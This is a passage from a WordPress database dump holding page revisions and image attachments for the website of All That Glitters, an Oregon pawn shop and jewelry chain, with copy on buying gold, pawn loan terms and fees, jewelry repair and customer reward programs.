unwanted jewelry items. Broken, missing stones we buy it all.\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 15:51:01','2015-03-10 22:51:01','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(221,2,'2015-03-10 16:48:07','2015-03-10 23:48:07','[row_fluid]\n[one_half]\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\n\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\n\n[/one_half]\n[one_half]\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"aligncenter wp-image-223\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-1024x1024.jpg\" alt=\"Gold Jewelry\" width=\"424\" height=\"424\" /></a>\n[/one_half]\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-autosave-v1','','','2015-03-10 16:48:07','2015-03-10 23:48:07','',37,'http://atgjewelry.com/fuze7/37-autosave-v1/',0,'revision','',0),(222,2,'2015-03-10 15:57:39','2015-03-10 22:57:39','dollar banks note money background','Dollar bank note money background','','inherit','open','open','','dollar-bank-note-money-background-2','','','2015-03-10 15:57:39','2015-03-10 22:57:39','',37,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Loans1.jpg',0,'attachment','image/jpeg',0),(223,2,'2015-03-10 15:58:26','2015-03-10 22:58:26','Closeup of gold jewelery with precious stones','Gold Jewelry','','inherit','open','open','','gold-jewelry-4','','','2015-03-10 15:58:26','2015-03-10 22:58:26','',37,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg',0,'attachment','image/jpeg',0),(224,2,'2015-03-10 15:59:12','2015-03-10 22:59:12','Closeup of yellow gold jewelery on a black background','Gold Jewelry','','inherit','open','open','','gold-jewelry-5','','','2015-03-10 15:59:12','2015-03-10 22:59:12','',37,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold-Jewelry.jpg',0,'attachment','image/jpeg',0),(225,2,'2015-03-10 16:00:25','2015-03-10 23:00:25','Five Dollars gold coins USD','Five Dollars gold coins','','inherit','open','open','','five-dollars-gold-coins-2','','','2015-03-10 16:00:25','2015-03-10 23:00:25','',37,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold-Coins.jpg',0,'attachment','image/jpeg',0),(227,2,'2015-03-10 16:05:38','2015-03-10 23:05:38','<div id=\"squares\"><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner1.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner2.jpg\" alt=\"watch\" /></a><a href=\"#\"><img src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/banner3.jpg\" alt=\"watch\" /></a></div>\r\n<h1 style=\"text-align: center;\">All That Glitters, Reinventing The Pawn Shop</h1>\r\n[row_fluid]\r\n[one_third]All of our pawn shops are designed with you, the customer, in mind. We strive to offer you an experience that will remind you more of an upscale retail store than a traditional pawn shop...and with our prices on merchandise and large selection, there\'s no reason to pay upscale retail prices again.[/one_third]\r\n[one_third]At All That Glitters, we believe that quality customer service is a direct result of qualified pawnbrokers working together for the common goal of presenting the public with high quality pre-owned products professionally displayed at prices well below retail.[/one_third]\r\n[one_third]\r\nAs our inventory is always changing, be sure and check back often to find that item you need at the price you can afford. At All That Glitters, there are no gimmicks, just good business.\r\n[/one_third]\r\n[/row_fluid]\r\n<h2><strong>Oregon Locations</strong></h2>\r\n<h4>[row]\r\n[span1][/span1]\r\n<strong>[span2]Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/12200+SE+Division+St,+Portland,+OR+97236/@45.5038667,-122.5373076,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a1c202f16d99:0xd11d950ef929fd57\" target=\"_blank\">12200 SE Division</a>\r\n503-761-9699[/span2]\r\n<strong>[span2]N. Portland</strong>\r\n<a href=\"https://www.google.com/maps/place/2932+N+Lombard+St,+Portland,+OR+97217/@45.576969,-122.6973386,17z/data=!3m1!4b1!4m2!3m1!1s0x5495a7bc5175458b:0x6a338a6c83521185\" target=\"_blank\">2932 N. Lombard</a>\r\n503-247-1019[/span2]\r\n<strong>[span2]Tigard</strong>\r\n<a href=\"https://www.google.com/maps/place/12760+SW+Pacific+Hwy,+Tigard,+OR+97223/@45.4270242,-122.7771537,17z/data=!3m1!4b1!4m2!3m1!1s0x54950d2478b9878b:0x8606ae6c36002c06\" target=\"_blank\">12760 SW Pacific Hwy</a>\r\n503-968-9510[/span2]\r\n<strong>[span2]Milwaukie</strong>\r\n<a href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE McLoughlin</a>\r\n503-785-1168[/span2]\r\n<strong>[span2]Salem</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 Lancaster Dr NE</a>\r\n503-362-9939[/span2]\r\n[span1][/span1]\r\n[/row]</h4>\r\n \r\n\r\n<img class=\"alignleft size-medium wp-image-89\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"Milwaukie_outside\" width=\"300\" height=\"241\" />Visit any one of our 5 Portland and Salem locations today!','Home','','inherit','open','open','','48-revision-v1','','','2015-03-10 16:05:38','2015-03-10 23:05:38','',48,'http://atgjewelry.com/fuze7/48-revision-v1/',0,'revision','',0),(229,2,'2015-03-10 16:11:33','2015-03-10 23:11:33','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\nWhy deal\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"alignright size-medium wp-image-223\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-300x300.jpg\" alt=\"Gold Jewelry\" width=\"300\" height=\"300\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:11:33','2015-03-10 23:11:33','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(230,2,'2015-03-10 16:12:30','2015-03-10 23:12:30','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\n\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"alignleft size-medium wp-image-223\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-300x300.jpg\" alt=\"Gold Jewelry\" width=\"300\" height=\"300\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:12:30','2015-03-10 23:12:30','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(231,2,'2015-03-10 16:13:29','2015-03-10 23:13:29','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of minutes.\r\n\r\nWhy deal with the hassle and risk of mail order gold buyers when you can come into a state licensed legitimate local business and safely sell your unwanted gold? Come in today for a free evaluation of your unwanted jewelry items. Broken, missing stones we buy it all.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry.jpg\"><img class=\"aligncenter wp-image-223 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Gold_Diamond-Jewelry-300x300.jpg\" alt=\"Gold Jewelry\" width=\"300\" height=\"300\" /></a>\r\n[/one_half]\r\n[/row_fluid]','We Buy Gold','','inherit','open','open','','37-revision-v1','','','2015-03-10 16:13:29','2015-03-10 23:13:29','',37,'http://atgjewelry.com/fuze7/37-revision-v1/',0,'revision','',0),(255,2,'2015-03-10 22:05:29','2015-03-11 05:05:29','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n<img class=\"alignleft wp-image-217\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--300x200.jpg\" alt=\"Electric Guitar\" width=\"245\" height=\"163\" />\r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\" wp-image-211 alignleft\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-300x191.jpg\" alt=\"Guns\" width=\"258\" height=\"164\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 22:05:29','2015-03-11 05:05:29','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(232,2,'2015-03-10 16:23:08','2015-03-10 23:23:08','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n \r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong>\r\n\r\n</div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\"alignright size-medium wp-image-211\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-300x191.jpg\" alt=\"Guns\" width=\"300\" height=\"191\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars-.jpg\"><img class=\"alignleft size-medium wp-image-217\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--300x200.jpg\" alt=\"Electric Guitar\" width=\"300\" height=\"200\" /></a></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 16:23:08','2015-03-10 23:23:08','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(233,2,'2015-03-10 16:24:13','2015-03-10 23:24:13','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n \r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\"alignright wp-image-211\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-300x191.jpg\" alt=\"Guns\" width=\"286\" height=\"182\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars-.jpg\"><img class=\"alignleft wp-image-217\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--300x200.jpg\" alt=\"Electric Guitar\" width=\"273\" height=\"182\" /></a></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 16:24:13','2015-03-10 23:24:13','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(234,2,'2015-03-10 16:25:39','2015-03-10 23:25:39','<h2>Quick and Easy...Cash Loans Today!</h2>\r\n[row_fluid]\r\n[one_half]\r\n<ul class=\"listing-check\">\r\n <li>Bring in your merchandise and let us know how much you would like to borrow.</li>\r\n <li>Our trained staff will evaluate the item(s) and discuss its loan value with you.</li>\r\n <li>We will explain the terms, and answer any questions you might have about the procedure.</li>\r\n <li>Sign the documents and leave with cash..it\'s just that easy!</li>\r\n</ul>\r\n<strong>Loan Terms:</strong>\r\n\r\nLoans are held for 60 days, and may be extended by paying a finance charge. A finance charge is based on the amount you borrow, and is calculated as follows:\r\n<ul class=\"listing-check\">\r\n <li>Interest: Three percent per month. One month minimum interest on all loans or $3.00, whichever is greater.</li>\r\n <li>Set-up Fee: 10% of loan amount on all loans and all loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Storage Fee: 3% of loan amount on all loans and loan renewals with a minimum charge of $2.00 and a maximum charge of $100.00.</li>\r\n <li>Gun Fee: $3.00 on new loans, plus any fee that a government agency imposes on the PLEDGEE for holding or transferring a firearm.</li>\r\n <li>Lost, Destroyed or Stolen Ticket Fee: A fee of $3.00 per loan contract.</li>\r\n</ul>\r\n \r\n\r\n[/one_half]\r\n[one_half]\r\n<div class=\"loans\">\r\n<p class=\"loans-left\">We loan on Gold, Platinum and/or Silver Jewelry. Items can be missing stones, broken or 100% resellable. Bring it in - we\'ll take a look at it and try to give you the most cash we can! Sorry, we cannot accept plated or gold-filled jewelry.</p>\r\n\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><strong>We also loan on a wide variety of Electronics, Videos / DVDs, Firearms, and Guitars! </strong></div>\r\n<div class=\"loans-left\"></div>\r\n<div class=\"loans-left\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns.jpg\"><img class=\"alignright wp-image-211\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guns-300x191.jpg\" alt=\"Guns\" width=\"258\" height=\"164\" /></a></div>\r\n<div class=\"loans-guitar\" style=\"text-align: right;\"><a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars-.jpg\"><img class=\"alignleft wp-image-217\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Guitars--300x200.jpg\" alt=\"Electric Guitar\" width=\"245\" height=\"163\" /></a></div>\r\n<div class=\"loans-firearms\"></div>\r\n</div>\r\n[/one_half]\r\n[/row_fluid]','Loans','','inherit','open','open','','34-revision-v1','','','2015-03-10 16:25:39','2015-03-10 23:25:39','',34,'http://atgjewelry.com/fuze7/34-revision-v1/',0,'revision','',0),(235,2,'2015-03-10 16:26:41','2015-03-10 23:26:41','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nYour fine jewelry is designed to last a lifetime - with the proper care. That\'s why we offer a complete range of on-site jewelry repair services that include :\r\n\r\n• Jewelry repairs and cleaning/polishing\r\n• Jewelry mounting & remounting\r\n• Stone replacement & retipping prongs\r\n• Plating & antiquing\r\n• Chain & Bracelet soldering, clasp repair\r\n• Change earring backs, replace posts\r\n• Watch Battery Replacement (Average sizes, No divers watches, please)\r\n\r\n[/one_half]\r\n[one_half]\r\nWe offer every day low prices on our jewelry repair and our jeweler can provide you with a free estimate before doing any work. We pride ourselves in quality work, so we evaluate every piece before taking them in to repair. Our jewelers guarantee their work, partial repairs will not be accepted to ensure the piece given back to you will be in exceptional condition.\r\n<h3></h3>\r\n<h3>Have a question or need an expert opinion?</h3>\r\nOur jewelers are more than happy to share their ideas with you. We service Platinum and 10K, 14K and 18K solid gold jewelry. We do not service gold plated, gold filled jewelry or other metals.[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry Repair','','inherit','open','open','','41-revision-v1','','','2015-03-10 16:26:41','2015-03-10 23:26:41','',41,'http://atgjewelry.com/fuze7/41-revision-v1/',0,'revision','',0),(237,2,'2015-03-10 16:30:55','2015-03-10 23:30:55','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg\"><img class=\"aligncenter size-medium wp-image-215\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings-300x200.jpg\" alt=\"Gold Jewelry\" width=\"300\" height=\"200\" /></a>\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-03-10 16:30:55','2015-03-10 23:30:55','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(238,2,'2015-03-10 16:32:04','2015-03-10 23:32:04','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg\"><img class=\"aligncenter size-medium wp-image-215\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings-300x200.jpg\" alt=\"Gold Jewelry\" width=\"300\" height=\"200\" /></a>\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-03-10 16:32:04','2015-03-10 23:32:04','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(239,2,'2015-03-10 16:32:32','2015-03-10 23:32:32','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg\"><img class=\"aligncenter wp-image-215 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings-1024x683.jpg\" alt=\"Gold Jewelry\" width=\"604\" height=\"403\" /></a>\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-03-10 16:32:32','2015-03-10 23:32:32','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(240,2,'2015-03-10 16:33:48','2015-03-10 23:33:48','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nBuying a piece of fine jewelry is often associated with a major event in a person\'s life. Whether it be a locket for a loved one\'s birthday, a fine wristwatch for a college graduate or a ring for the love of your life. Jewelry usually marks a special event in life, one to remember. Often times, the process of buying jewelry is an event in itself, or at least that is what Retail Jewelers are banking on.\r\n\r\nRetailers often mark-up jewelry as high as 300%. At All That Glitters we sell jewelry at prices at 50-70% off retail prices.\r\n\r\nIn addition to incredible savings, All That Glitters offers a number of FREE reward programs designed to build our relationship with our customers for years to come. All of our Customer Reward Programs require your original receipt, in your name.\r\n\r\nLifetime Stone Replacement - Our Life Time Stone Replacement Program is contingent upon you bringing in your jewelry every six months for a FREE Cleaning and Inspection. Our trained staff will inspect your jewelry for any noticeable wear and will recommend and list on your original receipt any repair work that may be needed at the time of inspection. You are responsible for maintaining your purchase. As long as you do this, if you ever lose a stone, we will replace it absolutely FREE.\r\n\r\nLoans at 50% - If the need were ever to arise for you to borrow some money, All That Glitters offers loans of 50% of your original purchase price on any jewelry that you bought with us. Just bring in an original purchase receipt that\'s in your name.\r\n\r\nTRADE-UP - Our Trade-up program is the best in the fine jewelry business. All That Glitters will give you the full value of your last jewelry purchase towards your next one! Just keep your original sales receipt, come in to one of our five locations, and select a piece valued at $50.00 more than your last one. Be sure you bring in an original receipt in your name. That\'s all there is to it.\r\n\r\n[/one_half]\r\n[one_half]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings.jpg\"><img class=\"aligncenter wp-image-215 size-large\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Colored-Rings-1024x683.jpg\" alt=\"Gold Jewelry\" width=\"604\" height=\"403\" /></a>\r\n[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry','','inherit','open','open','','39-revision-v1','','','2015-03-10 16:33:48','2015-03-10 23:33:48','',39,'http://atgjewelry.com/fuze7/39-revision-v1/',0,'revision','',0),(241,2,'2015-03-10 16:35:14','2015-03-10 23:35:14','[row_fluid]\r\n[one_half]\r\nYou can bring your gold, silver or platinum into any one of All That Glitters five convenient locations for a free assessment and cash offer. Our buyers will work to offer you the best cash price in town, and you can walk away with cash in hand in a matter of 